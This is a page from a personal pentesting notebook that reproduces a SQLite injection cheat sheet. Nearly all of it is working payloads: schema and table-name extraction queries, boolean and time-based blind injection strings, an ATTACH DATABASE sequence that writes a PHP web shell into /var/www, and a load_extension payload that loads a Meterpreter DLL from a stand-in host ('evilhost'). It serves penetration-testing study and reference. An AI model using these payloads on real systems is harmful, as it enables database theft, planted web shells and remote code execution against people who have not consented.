☕
Brinkles Pentesting Notebook
  • Introduction
    • My Journey to Pentesting
    • Twitter
    • Github
  • Certification Reviews
    • OSEP Review
    • CISSP Review
    • OSCP Review
    • RTJC Review
    • RTAC Review
    • CEH Review
    • CRTO Review
    • PNPT Review
    • eWPT Review
    • eJPTv1 Review
    • CCNP Security Review
    • CCNA Review
    • CompTIA Net +, A+ Review
  • C2 and Payloads
    • Sliver C2
    • Cobalt Strike
      • BOFs and Aggressor Scripts
        • Situational Awareness BOF
        • HOLLOW BOF
        • DLL_Version_Enumeration_BOF
        • InlineExecute-Assembly BOF
        • BOF.NET
        • C2-Tool-Collection BOFs
        • Inline-Execute-PE
      • Payloads
  • Tools
    • Internal Tools
      • BloodHound
      • Certi
      • Coercer
      • CrackMapExec
      • DCSync
      • DFSCoerce
      • DonPAPI
      • WMIEXEC
      • Kerberoasting
      • Lsassy
      • mitm6
      • Pcredz
      • PowerSploit
      • PrivExchange
      • Responder / RunFinger
      • Rubeus
      • Seatbelt
      • Seth
    • Web App Pentesting
      • Payload All The Things
        • Directory traversal
          • Deep Traversal
          • More Directory Traversal Payloads
        • SAML Injection
        • XXE - XML External Entity
        • XSS - Cross Site Scripting
        • XSLT Injection
        • XPATH injection
        • Upload Insecure Files
        • SQL injection
          • MSSQL Injection
          • MYSQL Injection
          • Oracle SQL Injection
          • PostgreSQL injection
          • SQLite Injection
        • Server Side Templates Injections
        • Server-Side Request Forgery
          • Payloads Included in Server-Side Request Forgery
        • Request Smuggling
        • OAuth
        • NoSQL injection
        • LDAP injection
        • Kubernetes
        • JSON Web Token
        • HTTP Parameter Pollution
        • GraphQL injection
        • CORS Misconfiguration
        • CRLF
        • Cross-Site Request Forgery
        • CSV Injection (Formula Injection)
        • File Inclusion
          • PHPINFOlfi.py
          • uploadlfi.py
  • Network Security
    • DMVPN GRE NHRP IPsec Profiles
    • Flex VPNs
    • GET VPN with Key Server
    • IKE Site to Site w/ IPSec
    • Point to Point GRE over IPSec
    • Remote Access VPN
    • Helpful Cisco Firewall CLI Commands
Powered by GitBook
On this page
  • Summary
  • SQLite comments
  • SQLite version
  • String based - Extract database structure
  • Integer/String based - Extract table name
  • Integer/String based - Extract column name
  • Boolean - Count number of tables
  • Boolean - Enumerating table name
  • Boolean - Extract info
  • Time based
  • Remote Command Execution using SQLite command - Attach Database
  • Remote Command Execution using SQLite command - Load_extension
  • References
  1. Tools
  2. Web App Pentesting
  3. Payload All The Things
  4. SQL injection

SQLite Injection

Summary

  • SQLite comments

  • SQLite version

  • String based - Extract database structure

  • Integer/String based - Extract table name

  • Integer/String based - Extract column name

  • Boolean - Count number of tables

  • Boolean - Enumerating table name

  • Boolean - Extract info

  • Time based

  • Remote Command Execution using SQLite command - Attach Database

  • Remote Command Execution using SQLite command - Load_extension

  • References

SQLite comments

--
/**/

SQLite version

select sqlite_version();

String based - Extract database structure

SELECT sql FROM sqlite_schema

Integer/String based - Extract table name

SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'

Use limit X+1 offset X, to extract all tables.

Integer/String based - Extract column name

SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name'

For a clean output

SELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),"TEXT",''),"INTEGER",''),"AUTOINCREMENT",''),"PRIMARY KEY",''),"UNIQUE",''),"NUMERIC",''),"REAL",''),"BLOB",''),"NOT NULL",''),",",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'

Boolean - Count number of tables

and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table

Boolean - Enumerating table name

and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number

Boolean - Extract info

and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char')

Time based

AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))

Remote Command Execution using SQLite command - Attach Database

ATTACH DATABASE '/var/www/lol.php' AS lol;
CREATE TABLE lol.pwn (dataz text);
INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>");--

Remote Command Execution using SQLite command - Load_extension

UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--

Note: By default this component is disabled

References

PreviousPostgreSQL injectionNextServer Side Templates Injections

Last updated 2 years ago

Injecting SQLite database based application - Manish Kishan Tanwar